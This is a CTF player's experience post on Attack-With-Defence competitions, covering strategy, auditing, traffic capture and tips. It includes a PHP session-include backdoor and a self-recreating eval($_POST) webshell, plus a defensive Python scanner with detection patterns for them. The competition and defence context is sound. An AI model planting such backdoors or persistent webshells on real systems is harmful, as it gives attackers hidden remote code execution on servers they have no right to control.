Author: Veneno@Nu1L
Manuscript fee: 200RMB
Submission method: send an email to linwei#360.cn, or log in to the web version to submit online
Original: https://www.anquanke.com/post/id/84675
Hello everyone, I'm Veneno, captain of the Nu1L team. In this article I'll talk about the AWD mode of offline CTF finals (some events use a sandbox mode instead) and how you, as a web dog, can survive among the big guys :) There may not be much technical meat here, so please don't flame me :)
1- What is AWD
Attack With Defence, in short: you are both the attacker and the sysadmin.
Competition format: usually each team gets one ssh box running one web service, and the flag is rotated every five minutes (one round). Each team starts with an initial score. When a team's flag is captured, the points it loses are split evenly among the teams that captured it. The service is also checked each round; a team whose service fails the check loses points, and those points are split evenly among the teams whose service check passed.
2- The AWD challenge author
For now let me pretend to be the challenge author QAQ
0x01: Challenge types
1- A CMS written by the author himself; to make it nastier, a .so extension is added on top.
2- A common or uncommon CMS.
3- Some framework vulnerabilities, such as the CI one dug up by master ph.
0x02: Language
At present, domestic competitions are still mostly PHP; of course there are some others, such as Python and Lua.
0x03: Vulnerability types
1- SQL injection, mostly
2- File inclusion
3- Various RCEs
4- File upload
0x04: What the challenge author is thinking
So that you bunch of contest grinders can't just look the challenge up, I'll use an unpublished CMS 0day... forget it, I'll add something of my own. Eh, wait, isn't that a bit too hard? Let me add a few simpler holes, and drop a shell directly into index.php or the web root?
3- How to attack
I believe everyone has done penetration testing in their day job, and the AWD game actually has a lot in common with everyday penetration testing.
0x01: How to get the flag
Generally speaking, there are two modes:
1- Send an HTTP request to a machine on the intranet, and the response contains the flag.
2- The flag is stored as a file, for example under the /home directory.
0x02: What a web dog needs to have
Roughly these points:
1- Fast vulnerability response.
Because sometimes the vulnerabilities used in a game can be found online, good search skills are needed here. Or the RCE is of the obvious kind.
2- The ability to write scripts quickly.
Because every team's service is the same, if, say, you can get the flag through injection, pulling them one by one with HackBar is obviously not elegant and it is especially easy to miss some; a small Python script is much better here.
3- A good mindset
After all, it's the big guys you are competing against, so when you find yourself being hit, don't let your mentality collapse. Once it collapses, it's basically gg.
0x03: When we have the advantage
Only with an absolute advantage can we afford to ignore everything else.
When we have only a slight advantage, we need to think a bit darker. For example, the gap between team A and team B may be only a few hundred points, and team A has a webshell on team B's box; how to drag team B down with you, I believe everyone understands.
0x04: When we are at a disadvantage
First and foremost, don't lose your head.
Secondly, because web traffic is easy to capture, even if we are hit we can analyze the traffic in time, see the other teams' payloads, and fight back.
If a shell is planted on your own server, of course delete it, but think about it this way: a shell planted on you is usually dropped by an automated script, which means other teams have probably been planted too, with the same path and password.
4- How to defend
In fact, defense mostly comes down to who is more careful.
0x01: When the game starts
When the game starts and we connect over ssh, the first thing to do is download the source code and make a backup right away.
Then deploy your own WAF, without breaking the organizer's service check as far as possible.
Generally the organizer may or may not hand out the previous period's traffic at intervals, so we need to capture the traffic ourselves.
0x02: Then get to work
Audit, audit, audit, of course.
0x03: When you find you have been hit
When you find you are being hit, first try restoring the earlier backup (remember to back up the current state first); if you are still being hit, split the work with your teammates: check the captured traffic, and check whether there is a shell on the server.
5- Some small tips
A few small examples and my own thoughts.
0x01: If you get FB
When you get FB (first blood), you must be calm, calm, calm. First of all, the target of our testing should be the NPC (or a local copy), not the services of the other teams, because how do you know they aren't capturing traffic? It happens often: a team gets FB, but not against the NPC, their payload gets picked up from the traffic by another team, and that team happens to have especially strong replay ability. Then an embarrassing situation arises: you clearly got FB, but the other team hits harder than you.
So when you get FB, you can fire off plenty of obfuscated traffic before writing the exp that hits the whole field.
0x02: A particularly familiar CMS
As a web dog, if you see WordPress your first reaction is surely wpscan. However, in offline competitions some challenge authors deploy the latest WordPress, and even the plugins have no vulnerabilities. Here are two examples I have run into in competitions:
1- The organizer deployed WordPress, and each team had a config backup file and phpMyAdmin. In this case the smartest move is to rely on your years of hand speed: quickly grab the other teams' backup files and log into phpMyAdmin. The smartest way to get the other teams' shells is not to write the shell through phpMyAdmin: if you turn out not to have the permission, you have wasted your time for nothing.
2- Also the latest WordPress with no plugins installed, but the organizer placed an arbitrary file upload in a deep directory, and the upload bypass was relatively simple.
0x03: Some interesting backdoors
For example the following; if you are interested, test it locally:
<?php
session_start();
extract($_GET); // every GET parameter becomes a variable, so a request can overwrite $_SESSION
if(preg_match('/[0-9]/',$_SESSION['PHPSESSID'])) exit; // bail out on any digit in the session id
if(preg_match('/\/|\./',$_SESSION['PHPSESSID'])) exit; // and on '/' or '.'
include(ini_get("session.save_path")."/sess_".$_SESSION['PHPSESSID']); // the session file is included as PHP code
?>
0x04: Some interesting shells
There is a project about PHP webshells on GitHub; interested students can search for it. Of course there are also some Python shells. Here is the simplest example:
<?php
ignore_user_abort(true); // keep running after the client disconnects
set_time_limit(0);       // no execution time limit
$file = "veneno.php";
$shell = '<?php eval($_POST[venenohi]);?>'; // single quotes: in double quotes PHP would interpolate $_POST[venenohi]
while (TRUE) {
    if (!file_exists($file)) { file_put_contents($file, $shell); } // re-create the shell whenever it is deleted
    usleep(50); // 50 microseconds: this loop burns CPU, which is how you spot it in top
}
?>
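A defensive helper for the procedure in section 4 (snapshot the web root right after the first ssh login, then compare it when you find you are being hit) that also flags the backdoor and immortal-shell patterns shown above. This is an added example, not code from the original post; the pattern list and the sample web root are constructed for illustration.

```python
import hashlib, re, tempfile
from pathlib import Path

# Source patterns taken from the two PHP samples on this page; a constructed
# starting list for this example, to be tuned to the CMS actually deployed.
SUSPICIOUS = {
    "eval-of-request": r"\beval\s*\(\s*\$_(GET|POST|REQUEST)",
    "extract-request": r"\bextract\s*\(\s*\$_(GET|POST|REQUEST)",
    "session-include": r"include\s*\(\s*ini_get\s*\(\s*['\"]session\.save_path",
    "immortal-loop": r"ignore_user_abort\s*\(\s*true[\s\S]*while\s*\(\s*(TRUE|true|1)\s*\)",
}

def snapshot(root: Path) -> dict:
    """Hash every file under root: take this right after the first ssh login."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff(baseline: dict, current: dict):
    """Files added, removed or modified since the baseline snapshot."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in baseline if k in current and baseline[k] != current[k])
    return added, removed, modified

def scan_source(path: Path) -> list:
    """Names of the SUSPICIOUS patterns present in one PHP file."""
    text = path.read_text(errors="replace")
    return [name for name, pat in SUSPICIOUS.items() if re.search(pat, text)]

def demo():
    """Constructed web root: clean baseline, then a planted shell and a tampered config."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (root / "config.php").write_text("<?php $db = 'localhost'; ?>\n")
    base = snapshot(root)
    # simulate what an attacker's automated script leaves behind
    (root / "veneno.php").write_text("<?php eval($_POST['venenohi']); ?>\n")
    (root / "config.php").write_text("<?php $db = 'localhost'; extract($_GET); ?>\n")
    added, removed, modified = diff(base, snapshot(root))
    findings = {f: scan_source(root / f) for f in added + modified}
    return added, removed, modified, findings

if __name__ == "__main__":
    print(demo())
```

Run snapshot() once at the start and keep the result next to your source backup; diff() then tells you exactly which files to inspect instead of auditing the whole tree again.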
6- Ending
After taking part in so many offline competitions, I feel I still need to improve my code auditing and my automated script writing, and I will keep reminding myself of these shortcomings.
Overall there is a lot I could say, but since this is more of an experience post there isn't much code; masters, please don't flame me. If you have any questions, you can add me on WeChat (FHcherish) to chat :)